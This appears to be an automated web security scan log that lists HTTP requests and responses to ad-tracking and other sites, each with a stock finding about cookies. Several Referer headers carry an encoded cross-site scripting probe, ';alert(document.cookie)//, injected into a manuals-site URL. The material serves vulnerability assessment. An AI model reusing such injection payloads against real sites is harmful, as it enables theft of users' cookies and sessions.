HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:26:09 GMT Server: Apache P3P: policyref="http://scripts.chitika.net/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Set-Cookie: _cc=G/SkJTIFoxB5zyrGvNoopUmJl2rsItRDWa+mMYtlFsMkqNkYLjf2S50TROQG59rAL1bd9/fru8qt59wzOMjm3zNoYwE3YNuGFh9r5pQyYF8IBuWtKzzuHg0EDf/OXTGwN4F0yzBRSsFrNaxBTurQk405PQiw6OztUAy+wVNGctUh2bI4o+E9Ip02zo1FpoGCl03GPW8YYrbsxuJG3RP/FXHhECqNMLZ3FujUPMYSQS4kC+I6tXLqBlwHa+Y8F+vNGqcNkAxZpUSMvHEO8khCYplFBx+Y+YbrxuGvKbBA4tZ0bqBN4lQhUBzx8YBlP2FsPJrbVK6NMroVMNC22xzJ0lAih4JSqLegFemViNUjn5mzE3l3Blj4eWfvwLcr4gqAZw5ywM/1YurC6/+iOUtyrecQGPVej55Oz02Rg41Zv724GqbA.1tBPbIb2KArc06KV27bEdA.4; path=/; domain=.chitika.net; expires=Sun, 05-Feb-2012 22:26:09 GMT Vary: Accept-Encoding Connection: close Content-Type: application/x-javascript; charset=utf-8 Content-Length: 19728
var ch_mmhtml = {"mobilehtml":"","pixelhtml":"","snurl":"http://searchnet.chitika.net/audience?cc=US&domain=homeappliance.manualsonline.com&ip=173.193.214.243&murl=foxnews8.com,usinsuranceonline.com,d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /track?target=http%3A%2F%2F0.r.msn.com%2F%3Fld%3D4vRbS86owapl3S39Z4NwMAKr4jyz22X6f5dq3sOZl3K-Tm58oqyL8R5a33jSckizaBNT5cqDC9dLnoaZwTRDOLvCZuP4Hd1tKvEGJ48Yg9ymMJUuchZooEvHE_4jToP11VzLwGkpUJmfw1tzGs_9KHJ_QsGQopcDEBlHJ02toOlMw3OhpT1Sp7-kfL9vx_wVr4rwVXhSB2g9cP7EGt9qNcAk5HUrKtBKDzRN8QhEo47mKLtSbpmbu2KcKS3GNjRKqjDvFQZcDTd5nER86kSK4uM2XjSrFBnsGCZ7NGKSh7ZoQtgERZ8WACUwwwqd-diM7ZNVQJTMGV28mF1YgtRXKVbb_ViygQJmNzPUXkUWKbQX8wNyfrVBB6rZ5hfUNg8ZC5_is4of3on-HJ&xargs=1Owx8oFMt4m2YkqUMiPXwDnPUhRRY7ZEJ9LJTWSrnbZhgBfErhtcKKOiM6mjHeLYQPOhFTlgMiQNUi0Wzinee2B3WGL1cDC9iHCONuiA3%2FJLEbd3x%2FFU5i2%2FejQpwMx5yyDTjsWiUUsISHcBq5Cyt5RwSg5CKdbMkrYy9xwqz2dX1VJJLhn25UnM9r3EOr3kRAA7PYs93YlDtwLI5JLm3nWA7dYYrFPozVln3uSAGFgS4lCNg3xHbrApZyDMytFV2l2C7ULWrmQ1l9bzagD%2FAT68Pby1uNFEA22B%2FM90suzy%2FYjy3MzE23bVmK7lC9jUeyBWeaoqNWxXGRluKS44nJO34%2BrioOQV%2FxSJ%2By45Fo8X%2FyWC5WegF0dVp6w1Bt2lFzVLgvn19KwnF%2BFWR4G6ZhENP1sKJJ8ayL0Tdvc1we8TPqrcCxAlGk5VR%2F94hQcEKqe6WwkOm3ytJOOEop9VFSJq%2FtFSYoywNhWzr%2BIMaHWBqkqSde8xNIVIc5X5QSFeoSqyFJwnv8A%3D&template=v1-450xauto\ HTTP/1.1 Host: mm.chitika.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _cc=G/SkJiIEkgB5jwthOgp2U7fj6wwhdgvL4c0tN7QIkjl+9DY+kxm0FYEPwYHEtzd1Eb9GVhAFySrB7FsCah5yekHnHk86QdWmqzPlPoX9fVgKhjoJ7H0CpjFT5Hp1o2UMeStsZFPsF38vogWeCxRsANnVfye1gm5VQVRitA3zocW7G6iOKSNpC8nW/fSMYPkd+FCgRcmr74lmkl5cwzW3Czwl6LeM3oQBJIYcJ6NbVb7AFAn8X+k1IsMDj5bEGLsE44aH3XGVfZEeq7YK0yCm1xoznT+oB6MyoGrFo+3L+n46HJMn/fIuhcbGfmpCGIWgP/8azfwodcqzdnmXzDHV02SLzkuIP4TROEiHhvvFYJCve1mdj9NNH2b6m71cRkwsP7WlTZEvF7RLkkrfjucSwCzhr5Z1qjMilr/trLois3rxw1y+NdQfz3XqMUHrYIFc6GSu7GKj22sCBmPetmAel7epjXByEoA7.VuO7eR5Qy1Z0VmN7sMLZzA.4;
Response
HTTP/1.1 302 Found Date: Sat, 05 Feb 2011 22:58:22 GMT Server: Apache P3P: policyref="http://scripts.chitika.net/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Set-Cookie: _cc=...[SNIP]....dshw/dsAXHyAOlroJxVp1A.4; path=/; domain=.chitika.net; expires=Sun, 05-Feb-2012 22:58:22 GMT Location: http://0.r.msn.com/?ld=4vRbS86owapl3S39Z4NwMAKr4jyz22X6f5dq3sOZl3K-Tm58oqyL8R5a33jSckizaBNT5cqDC9dLnoaZwTRDOLvCZuP4Hd1tKvEGJ48Yg9ymMJUuchZooEvHE_4jToP11VzLwGkpUJmfw1tzGs_9KHJ_QsGQopcDEBlHJ02toOlMw3OhpT1Sp7-kfL9vx_wVr4rwVXhSB2g9cP7EGt9qNcAk5HUrKtBKDzRN8QhEo47mKLtSbpmbu2KcKS3GNjRKqjDvFQZcDTd5nER86kSK4uM2XjSrFBnsGCZ7NGKSh7ZoQtgERZ8WACUwwwqd-diM7ZNVQJTMGV28mF1YgtRXKVbb_ViygQJmNzPUXkUWKbQX8wNyfrVBB6rZ5hfUNg8ZC5_is4of3on-HJ Content-Length: 605 Connection: close Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://0.r.msn.com/?ld=4vRbS86owapl3S39Z4NwMAKr ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en-us/library/ms537509(VS.85 HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 13151 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: A=I&I=AxUFAAAAAAAyBwAAuz30ai1AfCKXhVuk1jrJ1A!!&M=1; domain=.microsoft.com; expires=Tue, 05-Feb-2041 22:58:24 GMT; path=/ Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 05 Feb 2011 22:58:26 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /myresults/bookmarklet HTTP/1.1 Host: myweb2.search.yahoo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Date: Sun, 06 Feb 2011 16:01:23 GMT Set-Cookie: B=86nvjvd6kthej&b=3&s=sl; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.yahoo.com P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV" Location: http://bookmarks.yahoo.com/myresults/bookmarklet Cache-Control: private Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 190
The document has moved <A HREF="http://bookmarks.yahoo.com/myresults/bookmarklet">here</A>.<P> <!-- fe06.bookmarks.search.re3.yahoo.com uncompressed/chunked Sun Feb 6 08:01:23 PST 2011 -->
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /myca/acctsumm/us/action HTTP/1.1 Host: online.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /myca/logon/us/action HTTP/1.1 Host: online.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: orthoinfo.aaos.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 21:51:39 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-cookie: SaneID=173.193.214.243-16894361880414; path=/; expires=Sat, 05-Feb-16 21:51:39 GMT; domain=.aaos.org Content-Type: text/html; charset=UTF-8
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ps/?pid=114&cgn=13694&seg=5360 HTTP/1.1 Host: pixel.33across.com Proxy-Connection: keep-alive Referer: http://fls.doubleclick.net/activityi;src=189445;type=amexo204;cat=2009a134;ord=1;num=3654638226144.0156? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: 33x_ps=u%3D6285160526%3As1%3D1295482376917%3Ats%3D1296758537488%3As2.33%3D%2C6770%2C6570%2C4150%2C
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 05 Feb 2011 21:49:43 GMT Server: 33X1 P3P: CP='NOI DSP COR NID PSA PSD OUR IND UNI COM NAV INT DEM STA' Location: http://segment-pixel.invitemedia.com/pixel?partnerID=38&key=segment&code=5360&random=590147 Content-Length: 0 Set-Cookie: 33x_ps=u%3D6285160526%3As1%3D1295482376917%3Ats%3D1296942584073%3As2.33%3D%2C6770%2C6570%2C4150%2C5360%2C; Domain=.33across.com; Expires=Sun, 05-Feb-2012 21:49:44 GMT; Path=/ Connection: close Content-Type: text/plain; charset=UTF-8
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pixel.jsp?id=2773,2770,2765,2794,2792,2795,2763,2764&type=script&ipid=18400&sfid=0 HTTP/1.1 Host: pixel.intellitxt.com Proxy-Connection: keep-alive Referer: http://download32.us.intellitxt.com/iframescript.jsp?src=http%3A%2F%2Fpixel.intellitxt.com%2Fpixel.jsp%3Fid%3D2773%2C2770%2C2765%2C2794%2C2792%2C2795%2C2763%2C2764%26type%3Dscript%26ipid%3D18400%26sfid%3D0 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_PIX="AQAAAAEAAAQVAQAAAAEAAAEtqga0igAAAAAy/bdY"; VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63gEAAAEt98uhdQA-
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Set-Cookie: VM_PIX=AQAAAAkAAArrAQAAAAEAAAEt98vDoAAACuoBAAAAAQAAAS33y8OgAAAKywEAAAABAAABLffLw6AAAAroAQAAAAEAAAEt98vDoAAACs0BAAAAAQAAAS33y8OgAAAKzAEAAAABAAABLffLw6AAAArSAQAAAAEAAAEt98vDoAAABBUBAAAAAQAAAS2qBrSKAAAK1QEAAAABAAABLffLw6AAAAAAHcLRHA--; Domain=.intellitxt.com; Expires=Wed, 06-Apr-2011 21:48:02 GMT; Path=/ Content-Type: text/html Vary: Accept-Encoding Date: Sat, 05 Feb 2011 21:48:02 GMT Connection: close Content-Length: 3149
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pixel;r=535453051;fpan=1;fpa=P0-1697810850-1296942494788;ns=0;url=http%3A%2F%2Fwww.download32.com%2Fnslookup-software.html;ref=;ce=1;je=1;sr=1920x1200x16;enc=n;ogl=;dst=1;et=1296942494785;tzo=360;a=p-fdwEfW0hIeH9U;tags=721.8541.18400 HTTP/1.1 Host: pixel.quantserve.com Proxy-Connection: keep-alive Referer: http://www.download32.com/nslookup-software.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mc=4d21fad0-365c5-43e3d-97d7a; d=EKUAJKANq0itiBCpnizJGquYH6TbIAG6AQH9BYHWAJrR5q8fLyD5HhvB0s5SBu0fLC5Rs7ohqS4t8QyUYA-yASARKR8w4wANMOMAjFCSDU0esuGcFUAPJuELHrPBCxpRseEAKhHyAiABcuTD6CUDsjg7EeGaIQ
Response
HTTP/1.1 302 Found Connection: close Location: http://ad.yieldmanager.com/unpixel?id=1055858&id=1057014&t=2 Set-Cookie: d=EIcAJKANq0itiBCpnizJGquYH6TbIAGzAQH9BYHWAJrR5q8fLyD5HhvB0s5SBu0fLC5Rs7ohqS4t8QyUYA-yASARKR8w4wANMOMAjFCSDU0YhIFADybhCx6zwQsaUbHhAE0QIgAXLkw-glA7I4OxHhmiEA; expires=Fri, 06-May-2011 21:47:57 GMT; path=/; domain=.quantserve.com P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV" Cache-Control: private, no-cache, no-store, proxy-revalidate Pragma: no-cache Expires: Fri, 04 Aug 1978 12:00:00 GMT Content-Length: 0 Date: Sat, 05 Feb 2011 21:47:57 GMT Server: QS
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /cm?id=CAESEJ1QzO8syyE54_azrc6wYSw&cver=1 HTTP/1.1 Host: px.owneriq.net Proxy-Connection: keep-alive Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%2527%253balert%2528document.cookie%2529%252f%252f8fcf167d281/d/type/product_problem Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: memSessionId=59308638-3172-11e0-bdbb-0030485f67c6; si=7431457a-2008-4af6-823b-5fab70668c12; oxuuid=a9147669-7acb-495a-a7a7-b8a2e6b13599; ss=2n78c.6f2tf.6qa; rpq=351513.866594.150149.351513.866594
Response
HTTP/1.1 302 Moved Temporarily Server: Apache/2.2.15 (Fedora) X-Powered-By: PHP/5.2.13 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Location: http://ib.adnxs.com/px?bidder=13&seg=49740&qsdata=7431457a-2008-4af6-823b-5fab70668c12:4441692.10781187.8722&redir=http%3A%2F%2Fad.yieldmanager.com%2Fpixel%3Fadv%3D95413%26t%3D2%26id%3D351513%26id%3D866594%26id%3D150149%26id%3D351513%26id%3D866594 Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Sat, 05 Feb 2011 22:28:27 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 05 Feb 2011 22:28:27 GMT Connection: close Vary: Accept-Encoding Set-Cookie: gguuid=CAESEJ1QzO8syyE54_azrc6wYSw; expires=Thu, 04-Feb-2016 22:28:27 GMT; path=/; domain=.owneriq.net Set-Cookie: rpq=deleted; expires=Fri, 05-Feb-2010 22:28:26 GMT; path=/; domain=.owneriq.net
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /oxcm?s=4441692.10781187&oxuuid=a9147669-7acb-495a-a7a7-b8a2e6b13599 HTTP/1.1 Host: px.owneriq.net Proxy-Connection: keep-alive Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%2527%253balert%2528document.cookie%2529%252f%252f8fcf167d281/d/type/product_problem Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: memSessionId=59308638-3172-11e0-bdbb-0030485f67c6; ss=2n78c.6f2tf; si=7431457a-2008-4af6-823b-5fab70668c12; rpq=351513.866594
Response
HTTP/1.1 200 OK Server: Apache/2.2.15 (Fedora) X-Powered-By: PHP/5.2.13 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Content-Length: 43 Content-Type: image/gif Expires: Sat, 05 Feb 2011 22:27:24 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 05 Feb 2011 22:27:24 GMT Connection: close Set-Cookie: oxuuid=a9147669-7acb-495a-a7a7-b8a2e6b13599; expires=Thu, 04-Feb-2016 22:27:24 GMT; path=/; domain=.owneriq.net
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /p?sid%5B%5D=4441692&sid%5B%5D=10781187&rid%5B%5D=351513&rid%5B%5D=866594&pt=oiq HTTP/1.1 Host: px.owneriq.net Proxy-Connection: keep-alive Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%2527%253balert%2528document.cookie%2529%252f%252f8fcf167d281/d/type/product_problem Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: memSessionId=59308638-3172-11e0-bdbb-0030485f67c6
Response
HTTP/1.1 302 Moved Temporarily Server: Apache/2.2.15 (Fedora) X-Powered-By: PHP/5.2.13 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Location: http://cm.g.doubleclick.net/pixel?nid=owneriq1 Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Sat, 05 Feb 2011 22:27:10 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 05 Feb 2011 22:27:10 GMT Connection: close Vary: Accept-Encoding Set-Cookie: ss=2n78c.6f2tf; expires=Thu, 04-Feb-2016 22:27:10 GMT; path=/; domain=.owneriq.net Set-Cookie: si=18fa5f7f-8d3f-4a46-9deb-a7032f753452; expires=Thu, 04-Feb-2016 22:27:10 GMT; path=/; domain=.owneriq.net Set-Cookie: rpq=351513.866594; expires=Thu, 04-Feb-2016 22:27:10 GMT; path=/; domain=.owneriq.net
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /myca/loyalty/us/rewards/mracctmgmt/acctsumm?request_type=authreg_mr&Face=en_US&inav=menu_myacct_mrpointsum HTTP/1.1 Host: rewards.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
POST /action/doq.htm?pcode=utf-8&r=1296944169071.1 HTTP/1.1 Host: rt32.infolinks.com Proxy-Connection: keep-alive Referer: http://resources.infolinks.com/flash/ic.swf content-type: application/x-www-form-urlencoded;charset=utf-8 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cuid=11d77bcd-1e56-4ec4-8f17-60b91b3b6392; cnoi=2 Content-Length: 707
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
POST /action/doq.htm?pcode=utf-8&r=1296944132135.1 HTTP/1.1 Host: rt82.infolinks.com Proxy-Connection: keep-alive Referer: http://resources.infolinks.com/flash/ic.swf content-type: application/x-www-form-urlencoded;charset=utf-8 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cuid=11d77bcd-1e56-4ec4-8f17-60b91b3b6392; cnoi=1 Content-Length: 663
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
POST /action/doq.htm?pcode=utf-8&r=1296944122040.1 HTTP/1.1 Host: rt83.infolinks.com Proxy-Connection: keep-alive Referer: http://resources.infolinks.com/flash/ic.swf content-type: application/x-www-form-urlencoded;charset=utf-8 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cuid=11d77bcd-1e56-4ec4-8f17-60b91b3b6392; cnoi=0 Content-Length: 615
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b HTTP/1.1 Host: sb.voicefive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Content-Length: 0 Location: https://sb.voicefive.com/b2? Date: Sun, 06 Feb 2011 16:04:44 GMT Connection: close Set-Cookie: UID=4794bf8-184.50.222.110-1297008284; expires=Tue, 05-Feb-2013 16:04:44 GMT; path=/; domain=.voicefive.com P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC" Expires: Mon, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate Server: CS
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.0 200 OK Server: IM BidManager Date: Sat, 05 Feb 2011 21:48:02 GMT P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Expires: Sat, 05-Feb-2011 21:47:42 GMT Content-Type: text/javascript Pragma: no-cache Cache-Control: no-cache Set-Cookie: segments="13746|10659|16748|3425|38582,1298044270|40657|24085|10102|3391|3392|23864|11262|11265|9800|30353|7775|17277|38781|8|27273|2377"; Domain=invitemedia.com; expires=Sun, 05-Feb-2012 21:48:02 GMT; Path=/ Content-Length: 343
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: splunkbase.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <!-- web ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /site/2956?ret=html HTTP/1.1 Host: tags.bluekai.com Proxy-Connection: keep-alive Referer: http://c03.adsummos.net/a/e/s21719 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: bku=yQG99YBZ/AlFQiDm; bko=KJpMTsPQAJe62ZPAWmPMRnC3fxhA3xnadgI6Oq/ZLEWyw9s0tOiXKuWLHQR8wCMgekeLm818AYDJaWFPNyv09JtgWxy=; bkw4=KJpfoXU9y1M90zU9LsXb9T1wLfZFggw1b65ZDFRyIQQM9y1f9f1C9XmeKTPo2fuHNK2Zy3bKkVWmDctEkRFSakNiNn1hUeBiRBMXGAMpaac3tH7I9+V4YpCxhSbwgwfJuNrLbgAjcW6RsvELmqx2eBcBdfw0T0U4o9Hfs9NupXHyt8uO/zgeiItK1DQ2DeZe/OOnucgf4gN2FqcRgzDKHQ1P9ND/VE9yPYr8a3TyHPRwzGIqSi7En/8LKIFfdglEXTgLyXe3guyjs9fIYmxXMSnIwNe2gf3LwuVE1IhC5e8xwE1eaNe2AF7KmjGV/BKOlmdRy9YZD8Gjsn8MXzzrLn8uSySsaE4UzDttHnq73gDpla6x2xUtxxyQAdXYN5F1NacALxvojIOkRJOBRsH/N5KYZCX9BNXSf9XxYeJQ5kokiI8F5cXLR9vjdXumQucZBtzr9/usgtT=; bkst=KJhMR5Mehx9W+0LX4PAReQcjvQhsaCSJaZRZjg3VvRRsrijJ8AZbuzRoSqGoiHRZhLqs8oSVSKqkBf09biX9Nq1pkmjk8IVU8dAyZymawQYaCOk1eWh1M1yLe/h1EY61nzlBM/6LcMvOowZ8yqSOtqfzunolQTPS1/VZ9/DDsch5XQN0yLJBFnh541NXiLnzL6o10Nv2A6r5w101AX/eEPb9ln1D3aSSy57HB5MPB5pUFXent2y2w3xXnb303BhE+0MR8w2nVb90UCbysXlBeWyLMuy+nR61Mu61e1tBMRdDQt0DTtPQTsa/5lBB23G351bvX1gSaryeamXaiZLyksKZhmLS9AwOyLeDhBxTliEahBez01M/6+yGv5aWehCyo3RVkCqtSXL54xsewPRJ; bk=nNkisZVZbt/sHNJo; bkc=...[SNIP]...; bkdc=res
Response
HTTP/1.0 200 OK Date: Sat, 05 Feb 2011 22:25:31 GMT P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml" Pragma: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: max-age=0, no-cache, no-store Set-Cookie: bk=Nk1GUZVZbt/sHNJo; expires=Thu, 04-Aug-2011 22:25:31 GMT; path=/; domain=.bluekai.com Set-Cookie: bkc=...[SNIP]...; expires=Thu, 04-Aug-2011 22:25:31 GMT; path=/; domain=.bluekai.com Set-Cookie: bkdc=res; expires=Sun, 06-Feb-2011 22:25:31 GMT; path=/; domain=.bluekai.com BK-Server: 9936 Content-Length: 77 Content-Type: text/html Connection: keep-alive
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /search/display HTTP/1.1 Host: tools.cisco.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
